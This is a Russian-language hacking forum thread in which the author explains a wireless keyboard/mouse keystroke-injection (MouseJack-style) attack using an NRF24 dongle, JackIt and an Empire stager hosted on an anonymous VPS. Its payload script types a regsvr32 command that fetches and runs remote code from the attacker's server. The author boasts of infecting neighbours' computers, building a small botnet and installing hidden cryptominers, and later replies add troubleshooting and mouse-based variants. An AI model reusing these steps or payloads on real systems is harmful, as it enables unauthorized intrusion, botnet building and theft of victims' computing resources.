Статья Необычный взлом! с помощью чипа NRF24 и Hackrf-one или просто SDR тунер

"А не написать ли мне статью?" Ходил я с этими мыслями три дня и четыре ночи с ней спал .... Авось кто нить прочитает да и дополнит чем нибудь дельным.... Эх оглянувшись на все, думаю все же напишу-ка))

Этот взлом не раз описывался в бурж-нете да и на хабре была но все же интересно пройти через все невзгоды самому и подробно описать так сказать весь процесс создания этой атаки.

Вы спросите а нах нам еще про это читать когда все и так уже описано не раз и по русски, нет, отвечу я вам, методика мне показалось очень актуальной и не умрет, а наоборот будет цвести и пахнуть с прогрессом что нам и на руку!

И так поехали нам понадобится VPS на базе убунту или дебиан что в принципе одно и тоже с внешним айпи адресом желательно где нить в Гватемале!)) или в любой другой стране Тайвань, в идеале там где обитают попуасы которые про Россию слышали только раз в жизни и то не помнят где и от кого!))) Ну это о анонимности, мы же занимаемся не благим делом. ДА!? Сетевые разбойники......

Ноутбук, нетбук с не убитым аккумулятором, а то будет конец фильма на самом интересном месте, кто смотрел "жулиану" в 90-ых тот меня поймет или "просто Мария" да.. Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...

О главном опишу два варианта бюджетный и дорогой начну с первого покупаем на али вот эту стоит всего 5 баксов доставка быстрая продавашка вроде шустренько все отправляет!

Получили, прекрасно нужно будет припаять к нему антенну для большего радиуса действия вот как в итоге должно получится вот Антену можно любую на 2.4 Ггц подойдет от вайфай адаптера роутера и т.д. они тоже на этих частотах работают в основном есть конечно же и на 5Ггц вайфай но в наших широтах он встречается редко...

Далее идем на наш (Гватемальский) ВПС и устанавливаем софт, а именно нынче в тренде EMPIRE и сервис Apache2 который устанавливается простой командой:sudo apt-get install apache2 ну и запускаем его! sudo service apache2 start и еще очень важный момент устанавливаем утилиту SCREEN она предназначена для того чтобы запущенный процесс, скрипт не закрывался когда вы покидаете окно терминала управления вашим ВПС (то есть работал сутками) без Вашего присутствия это очень важный момент!

Итак идем в папку с empire устанавливаем и запускаем утилиту screen командой screen -S empire (создастся новая вкладка для него чтобы он фурычил без Вас)запускаем ./empire создаем: usestager windows/launcher_sct на мой взгляд он самый без палевный в данный момент командой INFO (маленькими) узнаем его настройки в строке OutFile вбиваем путь до сервиса апач /var/www/html/ название файла.sct настраиваем Listener подробно оставаться на этом не буду на борде много инфы на эту тему запуск, установка и т.д. по желанию можно настроить autorun persistence что бы Ваш зверек оставался в (вражеской)системе подольше)) описано нажимаем CNTRL+A и D закрывая этим самым вкладку с empire . Идем домой на родной раб. стол подклчаем наш девайс-донгл качаем для него утилиту отсюда устанавливаем ! В папке с Jackit есть файлик pspwn открываем его в leafpad-e все стираем и пишем (ох сколько я часов потратил на все это что бы понять что туда писать)
Код:
GUI r
DELAY 1000       ждем 1000 мл.сек
WIN STRING r     запускается run
DELAY 300          ждет (так как машины не у всех быстрые, покааа сообразит))
SHIFT ALT          меняется раскладка клавиатуры т.к. у всех по умолч. стоит русская
DELAY 300
STRING regsvr32 /s /n /u /i:http://(IP-вашего ВПС)/(имя файла которого мы создали в empire).sct scrobj.dll   << самый вкусный процесс в run печатается этот текст)))
ENTER     
DELAY 400
STRING exit         ну Вы поняли..
ENTER
Сохраняем запускаем скрипт jackit командой : ./jackit.py --script pspwn
ждем... Мне лично долго ждать не пришлось дело было вечером выходной много-этажка... поймал 4 -ех мышей запустил атаку 3 машины попались!)) поднялся на пару этажей выше еще парочка из 5 попались зашел на ВПС а там уже почти БОТНЕТ))) закинул скрытые майнеры пожинаю плоды, по двору правда еще не гулял...

Прошла неделя.... Я задался вопросом "так почему же ловит к примеру 5-6 мышей а заражается 2-3 машины?" Думаю Вы уже догадались что у нас в продаже идут (радио) мышки отдельно от клавиатуры и я нашел ответ как заставить вражеский курсор набирать на экранной клавиатуре (наш) текст в run powershell ... об этом позже, уже понадобится hackrf , GNUradio это есть дорогой вариант исполнения загрузки пэйлода

Для эффективности сего пред ставленого Вам метода можно еще прикупить на 2.4Ghz дабы покрыть все радио мыши в районе данный девайс уже спешит ко мне из Китая как приедет отпишу эффективность

ПС: моя первая статья, просьба сильно ногами не пинать меня т.к. за сочинения в школе у меня были двойки((( Простите за ВОДУ в начале! и продолжение следует так у меня в арсенале еще имеется PROXMARK, HACKRF-one и много чего еще интересного ..
 
Все, разобрался. Эти донглы бывают разными. Вот обсуждение https://github.com/BastilleResearch/mousejack/issues/6

Если не трудно подскажи как решил данный вопрос?....у меня аналогичная проблема
Dongl детектися, как "мышкоу".
Bus 005 Device 003: ID 1915:000c Nordic Semiconductor ASA
0003:1915:000C.0003: input,hidraw0: USB HID v1.11 Mouse [Weistech Weistech Wireless Desktop] on usb-0000:00:1d.3-1/input0

Поправил в исходниках как описано в обсуждении, испробовал несколько вариантов но, все впустую....resource is busy получаю при install

Заранее спасибо.
 
Как решил? Никак. Потратил 2 часа впустую и заказал Crazyradio. С ним, вроде, все сразу должно работать без танцев с бубном.
 
Так, эта штука перехватывает канал беспроводных мышек/клав и вбивает что прописано в команде, а именно подключается к ботнет-серверу
Я правильно понял?
 
эта штука позволяет "посылать" нажатия клавиш через радиоинтерфейс таким образом, что компьютер думает, что эти нажатия посылает легитимная радиоклава подключенная к нему. Что позволяет запускать свои команды на чужом компьютере, и, при необходимости, строить "ботнет" из таких компьютеров.
 
  • Нравится
Реакции: id2746
эта штука позволяет "посылать" нажатия клавиш через радиоинтерфейс таким образом, что компьютер думает, что эти нажатия посылает легитимная радиоклава подключенная к нему. Что позволяет запускать свои команды на чужом компьютере, и, при необходимости, строить "ботнет" из таких компьютеров.
Благодарю за ответ, с мышкой также сработает?
В плане перехватит радиосигнал мышки и подключиться как клавиатура?
 
Благодарю за ответ, с мышкой также сработает?
В плане перехватит радиосигнал мышки и подключиться как клавиатура?
судя по написанному, то должно сработать, что есть весьма хорошо.
сам не тестил - жду платку от наших узкоглазых таварисчей...
 
сработает и с мышкой но hackrf нужен.. и нужно знать какую винду атакуешь и размер экрана жертвы отрепетировать и записать нажатия мышкой на экранной клаве вызов мышкой беспроводной клавиатуры вызвать cmd.exe затем путь к бэкдору и его последующий запуск))
 
сработает и с мышкой но hackrf нужен.. и нужно знать какую винду атакуешь и размер экрана жертвы отрепетировать и записать нажатия мышкой на экранной клаве вызов мышкой беспроводной клавиатуры вызвать cmd.exe затем путь к бэкдору и его последующий запуск))
Ondrik8, может я не так вопрос понял немного. Я имел в виду следующее: есть беспроводная мышка, приемник воткнут в юсб порт ноутбука, кто-то подключается к этому приемнику (от мышки) и отправляет туда команды нажатия клавиш на клавиатуре. То есть, приемник от мышки, получается, стает приемником для клавиатуры. Я точно не уверен, можно ли так, но судя по тому, что читал об этом, то там приемник унифицирован и для мышей и для комплектов клавомышь, и должно получиться.
Что скажешь?
 
не правильно понял, есть же просто мыши (мяу) а есть мыши с клавами, так вот данный чип подходит только с клавами а hackrf только для мышей... надеюсь Бро понятно обьянсил?))
если что пиши в жабку мне обсудим.. но потом сцука гребаный offline

 
  • Нравится
Реакции: swap3r
Можно ли как-то провернуть подобное, обладая одной лишь hackrf?
 
Эх, тема отличная, но только вот у меня тут 20К+ человек живёт и чтобы сработало придётся изрядно так походить. Как думаете, стоит ли пытаться?
 
Подскажите, нужно взять ардуину и отдельно модуль NRF24 к нему? Нет готового собранного девайся с данным чипом, типа как SDR тюнер?
Ссылка на "вещЪ" со статьи не работает.
 
Привет. После повторного запуска python ругается на таймаут, понимаю что он не может подключится с свистку. Как с этим бороться?
 
Подскажите, нужно взять ардуину и отдельно модуль NRF24 к нему? Нет готового собранного девайся с данным чипом, типа как SDR тюнер?
Ссылка на "вещЪ" со статьи не работает.
Поиск на али по запросу "NRF24LU1" ничего не дал?
 
Всем привет.
Подскажите в чем может быть проблема.
Купил на aliexpress crazyradio за 600 руб. (на сколько оно настоящее фиг знает) и купил xq-02a за 1500 руб.
2018612130822.jpg

2018612132824.jpg


Прошил донгл по инструкции BastilleResearch/nrf-research-firmware.
До пункта Flash over USB (до прошивки 1915:7777 после прошивки 1915:0102) понимаю что все норм.

Дальше подключаю crazyradio к samsung note 3 смотрю lsusb

Bus 001 Device 005: ID 1915:0102 Nordic Semiconductor ASA

устройство видно и работает. Но бяда я почти ни кого не вижу.
Прошел по району нашел только 7 устройств (всего 7 карл (((( ).

В место штатной антенны размером 5 см прикрутил антенну на 8db, результат не изменился, следующая антенна 12db (тоже самое). Попробовал направленную yagi 16db вообще ни кого не вижу.

Перечитал данный пост, решил все за экранировать.
2018612131037.jpg

обмотал все черной изолентой, а поверх нее медную фольгу и еще изоленты.
Результат
2018612131442.jpg

2,5 слоя фольги.

Снова все подключил и пошел гулять. Результат получился тот же.

Что я делаю не так? можно ли как то замерить чувствительность этой сборки?

Решил присоединить xq-02a. Вроде все работает, но результата я не вижу совсем(((
2018612133135.jpg


Решил данный усилитель проверить на wi-fi с альфой. До подключения усилителя видел 20-30 штук сетей, после 3 ((((((((((.
Понимаю что он должен плохо видеть ближайшие сети, но удаленные сети должен видеть. А тут вблизи ни фига ни на дальние расстояния тоже самое.

Вопросы:
Нужно ли делать экранирование донгла?
Как можно замерять чувствительность устройства?
Подключаю к Raspberry, первый запуск норм, останавливаю скрипт jackit запускаю повторно пишет что устройство занято. это норм? На телефоне все ок., сколько бы не перезапускал все работает.

Как протестить этот усилитель? ( ) Пишет прям отлично работает у меня вообще не работает.

Гулял по городу с этой сборкой пару дней. Результат прям удручает максимум 8 устройств находил. Может не так прошил или нужно не jackit использовать?

Сборка:
- crazyradio
- samsung galaxy note 3
- iphone 5
1 Вариант: кидаю в сумку note 3 к нему crazyradio антенна на 8 или 12 db Y-кабель с доп питанием ( и без тестил). Поднимаю точку доступа на note 3, подключаюсь с iphone, захожу по ssh.
2 Вариант: note 3 к нему crazyradio антенна на 8 db.( в этот момент похож на охотника за приведениями )))) ).

думал может точка доступа перекрывает, но разницы не заметил.
 
Как написанно на хабре через малину не кто не пробывал,?
есть вопросы у меня))
 
я через нее пробовал.
Как то странно работает. если на пару часов оставить вроде видет

KEY ADDRESS CHANNELS COUNT SEEN TYPE PACKET
----- -------------- ---------- ------- ----------- ------- -----------------------------------------------------------
1 5A:D6:A9:52:B1 54 1 1:08:49 ago Unknown CD:7C:2E:7A:D4:72:A5:7A:A3:DB:6A:D6:2C:48:A9:57:54:D2
2 BA:55:AA:AE:8A 79 1 1:01:31 ago Unknown 05:54:8E:07:EF:ED:B2:61:51:6F:12:B5:A0:19:1E:B5:A5:F6:C5
4 A8:8A:24:CC:94 74 1 0:41:41 ago Unknown 95:22:44:4B:89:54:41:0D:5A:22:A6:BB:35:2C:24:BA:92:72:99:24
3 A5:B9:98:90:96 14 1 0:50:27 ago Unknown 6C:46:A1:15:44:5A:2C
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!